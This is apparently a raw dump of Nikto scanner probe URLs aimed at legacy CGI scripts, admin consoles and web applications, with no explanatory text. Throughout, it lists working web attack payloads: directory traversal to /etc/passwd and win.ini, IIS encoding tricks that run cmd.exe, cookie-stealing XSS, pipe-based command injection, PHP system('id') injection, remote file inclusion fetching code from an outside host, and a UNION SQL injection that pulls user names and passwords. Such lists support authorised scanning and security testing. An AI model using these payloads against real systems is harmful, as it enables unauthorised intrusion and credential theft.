Nikto Vulnerability Scan Urls

Nikto Vulnerability Scan Urls
***********
../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../winnt/win.ini
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../
/
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/.%252e/.%252e/.%252e/.%252e/winnt/win.ini
/.%252e/.%252e/.%252e/winnt/boot.ini
/../../../../../../../../../../../../windows/win.ini
/../../../../../../../../../../../../winnt/win.ini
/../webserver.ini
/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/..\\pixfir~1\\how_to_login.html
/./
/././..
////../../data/config/microsrv.cfg
/_mem_bin/formslogin.asp?\\"><script>alert('Vulnerable')</script>
/_mt/mt.cgi
/_vti_bin/shtml.exe
/~/<script>alert('Vulnerable')</script>.asp
/~/<script>alert('Vulnerable')</script>.aspx
/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
/~root/
/<script>alert('Vulnerable')</script>.shtm
/<script>alert('Vulnerable')</script>.stm
/3rdparty/phpMyAdmin/server_sync.php?c=phpinfo()
/666%0a%0a<script>alert('Vulnerable');</script>666.jsp
/a%5c.aspx
/addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
/admentor/adminadmin.asp
/admin.cgi
/admin/browse.asp?FilePath=c:\\&Opt=2&level=0
/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\"><script>alert(document.cookie)</script>
/administrator.cgi
/administrator/gallery/gallery.php?directory=\\"<script>alert(document.cookie)</script>
/administrator/gallery/navigation.php?directory=\\"<script>alert(document.cookie)</script>
/administrator/gallery/uploadimage.php?directory=\\"<script>alert(document.cookie)</script>
/administrator/gallery/view.php?path=\\"<script>alert(document.cookie)</script>
/administrator/popups/sectionswindow.php?type=web&link=\\"<script>alert(document.cookie)</script>
/administrator/upload.php?newbanner=1&choice=\\"<script>alert(document.cookie)</script>
/article.cfm?id=1'<script>alert(document.cookie);</script>
/author.asp
/bigconf.cgi
/billing/billing.apw
/bin/architext_query.pl
/bin/banner.cgi
/bin/bannereditor.cgi
/bin/bb-ack.sh
/bin/bb-histlog.sh
/bin/bb-rep.sh
/bin/bb-replog.sh
/bin/bbs_forum.cgi
/bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/bin/csPassword.cgi
/bin/csPassword/csPassword.cgi
/bin/cutecast/members/
/bin/day5datanotifier.cgi
/bin/db2www/library/document.d2w/show
/bin/logs/error_log
/bin/lookwho.cgi
/bin/maillist.cgi
/bin/maillist.pl
/bin/man.sh
/bin/responder.cgi
/bin/rguest.exe
/bin/rksh
/bin/rsh
/bin/search.cgi
/bin/tablebuild.pl
/bin/tcsh
/bin/test.cgi
/bin/test/test.cgi
/bin/textcounter.pl
/bin/webwho.pl
/bin/wguest.exe
/bin/wwwboard.cgi.cgi
/bin/wwwboard.pl
/bin/www-sql
/blah_badfile.shtml
/blah-whatever-badfile.jsp
/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini
/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd
/ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini
/catinfo?<u><b>TESTING
/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
/cfappman/index.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expeval/openfile.cfm
/cfide/administrator/index.cfm
/CFIDE/administrator/settings/version.cfm
/cfide/Administrator/startstop.html
/CFIDE/componentutils/cfcexplorer.cfc
/cgi.cgi/architext_query.pl
/cgi.cgi/bannereditor.cgi
/cgi.cgi/bb-histlog.sh
/cgi.cgi/bb-rep.sh
/cgi.cgi/bb-replog.sh
/cgi.cgi/bbs_forum.cgi
/cgi.cgi/bizdb1-search.cgi
/cgi.cgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi.cgi/csPassword/csPassword.cgi
/cgi.cgi/cutecast/members/
/cgi.cgi/day5datanotifier.cgi
/cgi.cgi/db2www/library/document.d2w/show
/cgi.cgi/lookwho.cgi
/cgi.cgi/maillist.cgi
/cgi.cgi/maillist.pl
/cgi.cgi/man.sh
/cgi.cgi/rguest.exe
/cgi.cgi/rksh
/cgi.cgi/rsh
/cgi.cgi/scripts/slxweb.dll/getfile?type=Library&file=[invalid
/cgi.cgi/search.cgi
/cgi.cgi/sensepost.exe?/c+dir
/cgi.cgi/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi.cgi/tcsh
/cgi.cgi/test.cgi
/cgi.cgi/test/test.cgi
/cgi.cgi/textcounter.pl
/cgi.cgi/wguest.exe
/cgi.cgi/ws_ftp.ini
/cgi.cgi/wwwboard.cgi.cgi
/cgi.cgi/wwwboard.pl
/cgi.cgi/www-sql
/cgi/architext_query.pl
/cgi/banner.cgi
/cgi/bannereditor.cgi
/cgi/bb-ack.sh
/cgi/bb-histlog.sh
/cgi/bb-rep.sh
/cgi/bb-replog.sh
/cgi/bbs_forum.cgi
/cgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi/csPassword.cgi
/cgi/csPassword/csPassword.cgi
/cgi/cutecast/members/
/cgi/day5datanotifier.cgi
/cgi/db2www/library/document.d2w/show
/cgi/logs/error_log
/cgi/lookwho.cgi
/cgi/maillist.cgi
/cgi/maillist.pl
/cgi/man.sh
/cgi/responder.cgi
/cgi/rguest.exe
/cgi/rksh
/cgi/rsh
/cgi/search.cgi
/cgi/tablebuild.pl
/cgi/tcsh
/cgi/test.cgi
/cgi/test/test.cgi
/cgi/textcounter.pl
/cgi/webwho.pl
/cgi/wguest.exe
/cgi/wwwboard.cgi.cgi
/cgi/wwwboard.pl
/cgi/www-sql
/cgi-914/architext_query.pl
/cgi-914/bannereditor.cgi
/cgi-914/bb-ack.sh
/cgi-914/bb-histlog.sh
/cgi-914/bb-rep.sh
/cgi-914/bb-replog.sh
/cgi-914/bbs_forum.cgi
/cgi-914/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-914/csPassword/csPassword.cgi
/cgi-914/cutecast/members/
/cgi-914/day5datanotifier.cgi
/cgi-914/db2www/library/document.d2w/show
/cgi-914/logs/error_log
/cgi-914/lookwho.cgi
/cgi-914/maillist.cgi
/cgi-914/maillist.pl
/cgi-914/man.sh
/cgi-914/responder.cgi
/cgi-914/rguest.exe
/cgi-914/rksh
/cgi-914/rsh
/cgi-914/search.cgi
/cgi-914/tablebuild.pl
/cgi-914/tcsh
/cgi-914/test.cgi
/cgi-914/test/test.cgi
/cgi-914/textcounter.pl
/cgi-914/webwho.pl
/cgi-914/wguest.exe
/cgi-914/wwwboard.cgi.cgi
/cgi-914/wwwboard.pl
/cgi-914/www-sql
/cgi-915/architext_query.pl
/cgi-915/banner.cgi
/cgi-915/bannereditor.cgi
/cgi-915/bb-ack.sh
/cgi-915/bb-histlog.sh
/cgi-915/bb-rep.sh
/cgi-915/bb-replog.sh
/cgi-915/bbs_forum.cgi
/cgi-915/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-915/csPassword.cgi
/cgi-915/csPassword/csPassword.cgi
/cgi-915/cutecast/members/
/cgi-915/day5datanotifier.cgi
/cgi-915/db2www/library/document.d2w/show
/cgi-915/logs/error_log
/cgi-915/lookwho.cgi
/cgi-915/maillist.cgi
/cgi-915/maillist.pl
/cgi-915/man.sh
/cgi-915/responder.cgi
/cgi-915/rguest.exe
/cgi-915/rksh
/cgi-915/rsh
/cgi-915/search.cgi
/cgi-915/tablebuild.pl
/cgi-915/tcsh
/cgi-915/test.cgi
/cgi-915/test/test.cgi
/cgi-915/textcounter.pl
/cgi-915/webwho.pl
/cgi-915/wguest.exe
/cgi-915/wwwboard.cgi.cgi
/cgi-915/wwwboard.pl
/cgi-915/www-sql
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
/cgi-bin/admin.cgi
/cgibin/architext_query.pl
/cgi-bin/architext_query.pl
/cgibin/banner.cgi
/cgi-bin/banner.cgi
/cgibin/bannereditor.cgi
/cgi-bin/bannereditor.cgi
/cgibin/bb-ack.sh
/cgi-bin/bb-ack.sh
/cgibin/bb-histlog.sh
/cgi-bin/bb-histlog.sh
/cgibin/bb-rep.sh
/cgi-bin/bb-rep.sh
/cgibin/bb-replog.sh
/cgi-bin/bb-replog.sh
/cgibin/bbs_forum.cgi
/cgi-bin/bbs_forum.cgi
/cgibin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/bugreport.cgi
/cgibin/csPassword.cgi
/cgi-bin/csPassword.cgi
/cgibin/csPassword/csPassword.cgi
/cgi-bin/csPassword/csPassword.cgi
/cgibin/cutecast/members/
/cgi-bin/cutecast/members/
/cgibin/day5datanotifier.cgi
/cgi-bin/day5datanotifier.cgi
/cgibin/db2www/library/document.d2w/show
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/FormHandler.cgi
/cgibin/logs/error_log
/cgi-bin/logs/error_log
/cgibin/lookwho.cgi
/cgi-bin/lookwho.cgi
/cgibin/maillist.cgi
/cgi-bin/maillist.cgi
/cgibin/maillist.pl
/cgi-bin/maillist.pl
/cgibin/man.sh
/cgi-bin/man.sh
/cgibin/php5
/cgibin/responder.cgi
/cgi-bin/responder.cgi
/cgibin/rguest.exe
/cgi-bin/rguest.exe
/cgibin/rksh
/cgi-bin/rksh
/cgibin/rsh
/cgi-bin/rsh
/cgibin/search.cgi
/cgi-bin/search.cgi
/cgibin/tablebuild.pl
/cgi-bin/tablebuild.pl
/cgibin/tcsh
/cgi-bin/tcsh
/cgibin/test.cgi
/cgi-bin/test.cgi
/cgibin/test/test.cgi
/cgi-bin/test/test.cgi
/cgibin/textcounter.pl
/cgi-bin/textcounter.pl
/cgibin/webwho.pl
/cgi-bin/webwho.pl
/cgibin/wguest.exe
/cgi-bin/wguest.exe
/cgi-bin/wrap
/cgibin/wwwboard.cgi.cgi
/cgi-bin/wwwboard.cgi.cgi
/cgibin/wwwboard.pl
/cgi-bin/wwwboard.pl
/cgibin/www-sql
/cgi-bin/www-sql
/cgi-bin-sdb/architext_query.pl
/cgi-bin-sdb/banner.cgi
/cgi-bin-sdb/bannereditor.cgi
/cgi-bin-sdb/bb-ack.sh
/cgi-bin-sdb/bb-histlog.sh
/cgi-bin-sdb/bb-rep.sh
/cgi-bin-sdb/bb-replog.sh
/cgi-bin-sdb/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin-sdb/csPassword.cgi
/cgi-bin-sdb/csPassword/csPassword.cgi
/cgi-bin-sdb/cutecast/members/
/cgi-bin-sdb/day5datanotifier.cgi
/cgi-bin-sdb/logs/error_log
/cgi-bin-sdb/lookwho.cgi
/cgi-bin-sdb/maillist.cgi
/cgi-bin-sdb/maillist.pl
/cgi-bin-sdb/responder.cgi
/cgi-bin-sdb/rguest.exe
/cgi-bin-sdb/rksh
/cgi-bin-sdb/rsh
/cgi-bin-sdb/tablebuild.pl
/cgi-bin-sdb/tcsh
/cgi-bin-sdb/test.cgi
/cgi-bin-sdb/test/test.cgi
/cgi-bin-sdb/webwho.pl
/cgi-bin-sdb/wguest.exe
/cgi-bin-sdb/wwwboard.cgi.cgi
/cgi-bin-sdb/www-sql
/cgi-exe/architext_query.pl
/cgi-exe/banner.cgi
/cgi-exe/bannereditor.cgi
/cgi-exe/bb-ack.sh
/cgi-exe/bb-histlog.sh
/cgi-exe/bb-rep.sh
/cgi-exe/bb-replog.sh
/cgi-exe/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-exe/cgiinfo.cgi
/cgi-exe/csPassword.cgi
/cgi-exe/csPassword/csPassword.cgi
/cgi-exe/cutecast/members/
/cgi-exe/day5datanotifier.cgi
/cgi-exe/formmail.cgi
/cgi-exe/logs/error_log
/cgi-exe/lookwho.cgi
/cgi-exe/maillist.cgi
/cgi-exe/maillist.pl
/cgi-exe/responder.cgi
/cgi-exe/restore_config.cgi
/cgi-exe/rguest.exe
/cgi-exe/rksh
/cgi-exe/rsh
/cgi-exe/search.cgi
/cgi-exe/tablebuild.pl
/cgi-exe/tcsh
/cgi-exe/test.cgi
/cgi-exe/test/test.cgi
/cgi-exe/textcounter.pl
/cgi-exe/webwho.pl
/cgi-exe/wguest.exe
/cgi-exe/wwwboard.cgi.cgi
/cgi-exe/wwwboard.pl
/cgi-exe/www-sql
/cgi-home/architext_query.pl
/cgi-home/banner.cgi
/cgi-home/bannereditor.cgi
/cgi-home/bb-ack.sh
/cgi-home/bb-histlog.sh
/cgi-home/bb-rep.sh
/cgi-home/bb-replog.sh
/cgi-home/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-home/csPassword.cgi
/cgi-home/csPassword/csPassword.cgi
/cgi-home/cutecast/members/
/cgi-home/day5datanotifier.cgi
/cgi-home/logs/error_log
/cgi-home/lookwho.cgi
/cgi-home/maillist.cgi
/cgi-home/maillist.pl
/cgi-home/responder.cgi
/cgi-home/rguest.exe
/cgi-home/rksh
/cgi-home/rsh
/cgi-home/search.cgi
/cgi-home/tablebuild.pl
/cgi-home/tcsh
/cgi-home/test.cgi
/cgi-home/test/test.cgi
/cgi-home/textcounter.pl
/cgi-home/webwho.pl
/cgi-home/wguest.exe
/cgi-home/wwwboard.cgi.cgi
/cgi-home/www-sql
/cgi-local/architext_query.pl
/cgi-local/banner.cgi
/cgi-local/bannereditor.cgi
/cgi-local/bb-ack.sh
/cgi-local/bb-histlog.sh
/cgi-local/bb-rep.sh
/cgi-local/bb-replog.sh
/cgi-local/bbs_forum.cgi
/cgi-local/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-local/csPassword.cgi
/cgi-local/csPassword/csPassword.cgi
/cgi-local/cutecast/members/
/cgi-local/day5datanotifier.cgi
/cgi-local/db2www/library/document.d2w/show
/cgi-local/logs/error_log
/cgi-local/lookwho.cgi
/cgi-local/maillist.cgi
/cgi-local/maillist.pl
/cgi-local/man.sh
/cgi-local/responder.cgi
/cgi-local/rguest.exe
/cgi-local/rksh
/cgi-local/rsh
/cgi-local/search.cgi
/cgi-local/tablebuild.pl
/cgi-local/tcsh
/cgi-local/test.cgi
/cgi-local/test/test.cgi
/cgi-local/textcounter.pl
/cgi-local/webwho.pl
/cgi-local/wguest.exe
/cgi-local/wwwboard.cgi.cgi
/cgi-local/wwwboard.pl
/cgi-local/www-sql
/cgi-mod/architext_query.pl
/cgi-mod/banner.cgi
/cgi-mod/bannereditor.cgi
/cgi-mod/bb-ack.sh
/cgi-mod/bb-histlog.sh
/cgi-mod/bb-rep.sh
/cgi-mod/bb-replog.sh
/cgi-mod/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-mod/csPassword.cgi
/cgi-mod/csPassword/csPassword.cgi
/cgi-mod/cutecast/members/
/cgi-mod/day5datanotifier.cgi
/cgi-mod/logs/error_log
/cgi-mod/lookwho.cgi
/cgi-mod/maillist.cgi
/cgi-mod/maillist.pl
/cgi-mod/responder.cgi
/cgi-mod/rguest.exe
/cgi-mod/rksh
/cgi-mod/rsh
/cgi-mod/server.php
/cgi-mod/tablebuild.pl
/cgi-mod/tcsh
/cgi-mod/test.cgi
/cgi-mod/test/test.cgi
/cgi-mod/webwho.pl
/cgi-mod/wguest.exe
/cgi-mod/wwwboard.cgi.cgi
/cgi-mod/www-sql
/cgi-perl/architext_query.pl
/cgi-perl/banner.cgi
/cgi-perl/bannereditor.cgi
/cgi-perl/bb-ack.sh
/cgi-perl/bb-histlog.sh
/cgi-perl/bb-rep.sh
/cgi-perl/bb-replog.sh
/cgi-perl/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-perl/csPassword.cgi
/cgi-perl/csPassword/csPassword.cgi
/cgi-perl/cutecast/members/
/cgi-perl/day5datanotifier.cgi
/cgi-perl/logs/error_log
/cgi-perl/lookwho.cgi
/cgi-perl/maillist.cgi
/cgi-perl/maillist.pl
/cgi-perl/responder.cgi
/cgi-perl/rguest.exe
/cgi-perl/rksh
/cgi-perl/rsh
/cgi-perl/search.cgi
/cgi-perl/tablebuild.pl
/cgi-perl/tcsh
/cgi-perl/test.cgi
/cgi-perl/test/test.cgi
/cgi-perl/webwho.pl
/cgi-perl/wguest.exe
/cgi-perl/wwwboard.cgi.cgi
/cgi-perl/www-sql
/cgis/architext_query.pl
/cgis/banner.cgi
/cgis/bannereditor.cgi
/cgis/bb-ack.sh
/cgis/bb-histlog.sh
/cgis/bb-rep.sh
/cgis/bb-replog.sh
/cgis/bbs_forum.cgi
/cgis/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgis/csPassword.cgi
/cgis/csPassword/csPassword.cgi
/cgis/cutecast/members/
/cgis/day5datanotifier.cgi
/cgis/logs/error_log
/cgis/lookwho.cgi
/cgis/maillist.cgi
/cgis/maillist.pl
/cgis/man.sh
/cgis/responder.cgi
/cgis/rguest.exe
/cgis/rksh
/cgis/rsh
/cgis/search.cgi
/cgis/tablebuild.pl
/cgis/tcsh
/cgis/test.cgi
/cgis/test/test.cgi
/cgis/textcounter.pl
/cgis/webwho.pl
/cgis/wguest.exe
/cgis/wwwboard.cgi.cgi
/cgis/wwwboard.pl
/cgis/www-sql
/cgi-sys/architext_query.pl
/cgi-sys/banner.cgi
/cgi-sys/bannereditor.cgi
/cgi-sys/bb-ack.sh
/cgi-sys/bb-histlog.sh
/cgi-sys/bb-rep.sh
/cgi-sys/bb-replog.sh
/cgi-sys/bbs_forum.cgi
/cgi-sys/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-sys/csPassword.cgi
/cgi-sys/csPassword/csPassword.cgi
/cgi-sys/cutecast/members/
/cgi-sys/day5datanotifier.cgi
/cgi-sys/db2www/library/document.d2w/show
/cgi-sys/logs/error_log
/cgi-sys/lookwho.cgi
/cgi-sys/maillist.cgi
/cgi-sys/maillist.pl
/cgi-sys/man.sh
/cgi-sys/responder.cgi
/cgi-sys/rguest.exe
/cgi-sys/rksh
/cgi-sys/rsh
/cgi-sys/search.cgi
/cgi-sys/tablebuild.pl
/cgi-sys/tcsh
/cgi-sys/test.cgi
/cgi-sys/test/test.cgi
/cgi-sys/textcounter.pl
/cgi-sys/webwho.pl
/cgi-sys/wguest.exe
/cgi-sys/wwwboard.cgi.cgi
/cgi-sys/wwwboard.pl
/cgi-sys/www-sql
/cgi-win/architext_query.pl
/cgi-win/banner.cgi
/cgi-win/bannereditor.cgi
/cgi-win/bb-ack.sh
/cgi-win/bb-histlog.sh
/cgi-win/bb-rep.sh
/cgi-win/bb-replog.sh
/cgi-win/bbs_forum.cgi
/cgi-win/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-win/csPassword.cgi
/cgi-win/csPassword/csPassword.cgi
/cgi-win/cutecast/members/
/cgi-win/day5datanotifier.cgi
/cgi-win/logs/error_log
/cgi-win/lookwho.cgi
/cgi-win/maillist.cgi
/cgi-win/maillist.pl
/cgi-win/man.sh
/cgi-win/responder.cgi
/cgi-win/rguest.exe
/cgi-win/rksh
/cgi-win/rsh
/cgi-win/search.cgi
/cgi-win/tablebuild.pl
/cgi-win/tcsh
/cgi-win/test.cgi
/cgi-win/test/test.cgi
/cgi-win/textcounter.pl
/cgi-win/webwho.pl
/cgi-win/wguest.exe
/cgi-win/wwwboard.cgi.cgi
/cgi-win/wwwboard.pl
/cgi-win/www-sql
/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
/ConsoleHelp/default.jsp
/courier/intermediate_login.html
/ea-gBook/index_inc.php?inc_ordner=http://cirt.net/rfiinc.txt??&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/emailfriend/emailarticle.php?id=\\"<script>alert(document.cookie)</script>
/emailfriend/emailfaq.php?id=\\"<script>alert(document.cookie)</script>
/emailfriend/emailnews.php?id=\\"<script>alert(document.cookie)</script>
/examples/cookie
/examples/session
/fcgi-bin/architext_query.pl
/fcgi-bin/banner.cgi
/fcgi-bin/bannereditor.cgi
/fcgi-bin/bb-ack.sh
/fcgi-bin/bb-histlog.sh
/fcgi-bin/bb-rep.sh
/fcgi-bin/bb-replog.sh
/fcgi-bin/bbs_forum.cgi
/fcgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/fcgi-bin/csPassword.cgi
/fcgi-bin/csPassword/csPassword.cgi
/fcgi-bin/cutecast/members/
/fcgi-bin/day5datanotifier.cgi
/fcgi-bin/logs/error_log
/fcgi-bin/lookwho.cgi
/fcgi-bin/maillist.cgi
/fcgi-bin/maillist.pl
/fcgi-bin/man.sh
/fcgi-bin/responder.cgi
/fcgi-bin/rguest.exe
/fcgi-bin/rksh
/fcgi-bin/rsh
/fcgi-bin/search.cgi
/fcgi-bin/tablebuild.pl
/fcgi-bin/tcsh
/fcgi-bin/test.cgi
/fcgi-bin/test/test.cgi
/fcgi-bin/textcounter.pl
/fcgi-bin/webwho.pl
/fcgi-bin/wguest.exe
/fcgi-bin/wwwboard.cgi.cgi
/fcgi-bin/wwwboard.pl
/fcgi-bin/www-sql
/file/../../../../../../../../etc/
/filemanager/filemanager_forms.php?lib_path=http://cirt.net/rfiinc.txt?
/forum/My_eGallery/public/displayCategory.php
/forumdisplay.php?GLOBALS[]=1&f=2&comma=\\".system('id').\\"
/forums//adm/config.php
/forums//admin/config.php
/forums//administrator/config.php
/forums/config.php
/ganglia/
/gb/index.php?login=true
/geeklog/users.php
/getaccess
/global.inc
/guestbook/admin.php
/guestbook/guestbook.html
/guestbook/guestbookdat
/guestbook/pwd
/help.html
/help/
/hola/admin/cms/htmltags.php?datei=./sec/data.php
/horde/imp/test.php
/horde/test.php
/horde/test.php?mode=phpinfo
/htbin/architext_query.pl
/htbin/banner.cgi
/htbin/bannereditor.cgi
/htbin/bb-ack.sh
/htbin/bb-histlog.sh
/htbin/bb-rep.sh
/htbin/bb-replog.sh
/htbin/bbs_forum.cgi
/htbin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/htbin/csPassword.cgi
/htbin/csPassword/csPassword.cgi
/htbin/cutecast/members/
/htbin/day5datanotifier.cgi
/htbin/db2www/library/document.d2w/show
/htbin/logs/error_log
/htbin/lookwho.cgi
/htbin/maillist.cgi
/htbin/maillist.pl
/htbin/man.sh
/htbin/responder.cgi
/htbin/rguest.exe
/htbin/rksh
/htbin/rsh
/htbin/search.cgi
/htbin/tablebuild.pl
/htbin/tcsh
/htbin/test.cgi
/htbin/test.cgi.php
/htbin/test/test.cgi
/htbin/textcounter.pl
/htbin/webwho.pl
/htbin/wguest.exe
/htbin/wwwboard.cgi.cgi
/htbin/wwwboard.pl
/htbin/www-sql
/html/cgi-bin/cgicso?query=AAA
/https-admserv/bin/index?/<script>alert(document.cookie)</script>
/imp/horde/test.php
/imp/horde/test.php?mode=phpinfo
/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
/inc/common.load.php
/inc/config.php
/inc/dbase.php
/index.html.bak
/index.html~
/index.php/123
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
/index.php?dir=<script>alert('Vulnerable')</script>
/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20informa
/index.php?option=search&searchword=<script>alert(document.cookie);</script>
/invoker/JMXInvokerServlet
/jmx-console/
/jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer
/kboard/
/lists/admin/
/mambo/index.php?Itemid=u2Ia3
/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
/modules/My_eGallery/public/displayCategory.php
/mpcgi/admin.cgi
/mpcgi/architext_query.pl
/mpcgi/banner.cgi
/mpcgi/bannereditor.cgi
/mpcgi/bb-ack.sh
/mpcgi/bb-histlog.sh
/mpcgi/bb-rep.sh
/mpcgi/bb-replog.sh
/mpcgi/bbs_forum.cgi
/mpcgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/mpcgi/csPassword.cgi
/mpcgi/csPassword/csPassword.cgi
/mpcgi/cutecast/members/
/mpcgi/day5datanotifier.cgi
/mpcgi/db2www/library/document.d2w/show
/mpcgi/index.php
/mpcgi/logs/error_log
/mpcgi/lookwho.cgi
/mpcgi/maillist.cgi
/mpcgi/maillist.pl
/mpcgi/man.sh
/mpcgi/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/mpcgi/responder.cgi
/mpcgi/rguest.exe
/mpcgi/rksh
/mpcgi/rsh
/mpcgi/search.cgi
/mpcgi/tablebuild.pl
/mpcgi/tcsh
/mpcgi/test.cgi
/mpcgi/test/test.cgi
/mpcgi/textcounter.pl
/mpcgi/webwho.pl
/mpcgi/wguest.exe
/mpcgi/wwwboard.cgi.cgi
/mpcgi/wwwboard.pl
/mpcgi/www-sql
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
/msadc/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/OG
/My_eGallery/public/displayCategory.php
/nosuchurl/><script>alert('Vulnerable')</script>
/ows-bin/
/ows-bin/.cobalt
/ows-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
/ows-bin/.fhp
/ows-bin/adduser.cgi
/ows-bin/admin.php
/ows-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/ows-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/ows-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/ows-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
/ows-bin/architext_query.pl
/ows-bin/astrocam.cgi
/ows-bin/banner.cgi
/ows-bin/bannereditor.cgi
/ows-bin/bb-ack.sh
/ows-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/ows-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/ows-bin/bb-histlog.sh
/ows-bin/bb-rep.sh
/ows-bin/bb-replog.sh
/ows-bin/bbs_forum.cgi
/ows-bin/blog/mt-check.cgi
/ows-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/ows-bin/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
/ows-bin/c99.php
/ows-bin/calendar
/ows-bin/calendar/index.cgi
/ows-bin/cart.pl
/ows-bin/cart.pl?db='
/ows-bin/cart32.exe
/ows-bin/cgiwrap/~adm
/ows-bin/cgiwrap/~daemon
/ows-bin/cgiwrap/~GujG2
/ows-bin/cgiwrap/~listen
/ows-bin/cgiwrap/~unknown
/ows-bin/classifieds/index.cgi
